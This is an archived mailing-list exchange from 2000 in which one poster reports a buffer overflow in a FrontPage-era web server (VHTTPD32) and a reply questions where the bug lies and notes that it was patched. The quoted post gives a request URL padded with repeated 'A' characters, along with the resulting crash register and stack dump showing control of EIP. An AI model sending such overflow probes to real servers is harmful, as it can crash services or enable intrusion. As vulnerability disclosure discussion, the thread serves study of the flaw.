That's hardly overflow in FP, VHTTPD32 does not seem to be part of WindowsNT
and more hardly of Frontpage (could be some old version of course), what
operating system are you using?
This seems to be overflow in HTTP (Web Server, PWS or IIS) and for
WIndowsNT it was handled long time ago in some postfix and service packs.
It would be good idea to include complete information about the system you
are testing, otherwise it is useless.
Daniel
> -----Original Message-----
> From: Roman [mailto:[EMAIL PROTECTED]]
> Sent: Saturday, April 22, 2000 10:16 PM
> To: [EMAIL PROTECTED]
> Subject: Re: More vulnerabilities in FP
>
>
> Hello,
>
> > First remote FrontPage exploit?
>
> How about this one:
> http://server/AAAAAAAAAAAA<a lots of A>AAAAAA
>
> FP will overflow and someone will see this message:
>
> VHTTPD32 caused an invalid page fault in
> module <unknown> at 0000:41414141.
> Registers:
> EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
> EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
> ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
> EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> 41414141 41414141 66204141 656c6961 6f662064 32312072
> 2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
> 6e207365 6520746f 74736978 00000000
>
> Tested on FP 3.0.2.926. Maybe others?
>
